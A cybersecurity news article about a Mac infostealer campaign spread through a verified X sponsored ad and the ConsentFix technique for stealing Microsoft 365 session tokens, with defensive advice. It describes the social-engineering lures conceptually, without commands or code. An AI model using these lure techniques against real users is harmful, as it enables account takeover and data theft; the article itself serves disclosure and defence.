GBHackers

Verified X Sponsored Ad Spreads Mac Malware While ConsentFix Hijacks Microsoft 365 Accounts


A Mac-targeting ClickFix campaign amplified through a verified X sponsored ad, and a novel browser-based hijack technique called ConsentFix that exfiltrates Microsoft 365 session tokens without traditional malware.

Researchers at Jamf and Malwarebytes tracked the X incident where a verified account ran a sponsored advertisement promoting a macOS utility dubbed “DynamicLake” a lookalike for legitimate Dynamic Island utilities.

The ad redirected visitors to a clone domain, dynamicmacisland[.]com, which instructed users to open Terminal and paste a command from their clipboard. That single user action silently installed an infostealer family related to Atomic Stealer.

The campaign leverages three converging tactics: convincing ClickFix-style social engineering that asks users to execute Terminal commands, visually authentic lookalike domains that mimic trusted apps, and paid advertising to scale reach and impart credibility via verification badges.

This attack is notable because it weaponizes the user’s own trust in platform signals: verified account status and paid placement.

Historically, ClickFix campaigns relied on phony “human verification” flows; this iteration couples that social engineering with macOS-specific command-line installs that evade many endpoint protections because the user explicitly invokes Terminal.

The result is effective distribution of macOS infostealers without malicious attachments or drive-by exploits.

Jamf’s disclosure and subsequent takedown of the ad underscore that platform vetting and automated ad screening can be circumvented when adversaries craft benign-looking creatives and target legitimate ad pipelines.

Jamf said in a report shared with GBhackers, Parallel to this, Windows and cloud users face ConsentFix, a refined technique for Microsoft 365 account takeover that removes the need for malware or password theft.

Reported by BleepingComputer and analyzed by incident responders, ConsentFix manipulates the browser and OAuth flows so that victims inadvertently hand over session tokens.

An initial lure often a link hosted on trusted services like Dropbox and sometimes password-protected to avoid automated inspection presents a convincing Microsoft sign-in prompt.

How the ConsentFix trap looks (Source : Malwarebytes).

The user is then instructed to perform an unusual but plausible action, such as dragging a localhost callback link into the browser.

Within seconds the attacker receives the callback tokens and can access OneDrive, Teams, and other Office 365 services without the victim ever typing credentials or bypassing MFA.

ConsentFix is dangerous because it subverts standard security awareness defenses: users do not enter passwords, do not install software, and do not trigger traditional policy alerts.

The technique has begun circulating on Russian-language cybercrime forums, lowering the bar for less seasoned threat actors and increasing likely volume.

Defensive posture against these threats requires both technical and behavioral measures. For endpoints, restrict or monitor clipboard-based installation patterns and enforce application allowlists and Kernel Extension/API controls for macOS.

For cloud, strengthen conditional access policies, require token lifetime constraints, and monitor anomalous OAuth consent and token-issuance events.

On the human side, train employees to treat unexpected verification steps and drag-and-drop browser actions as red flags, scrutinize short-lived or password-protected links hosted on third-party platforms, and verify ads and social posts through independent channels before acting.

These incidents reiterate a core lesson: platform-provided signals verified badges, paid placements, and familiar sign-in screens are not guarantees of legitimacy. Link-level inspections by security teams, tighter ad vetting by platforms, and rapid reporting procedures remain essential.

Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.



Source link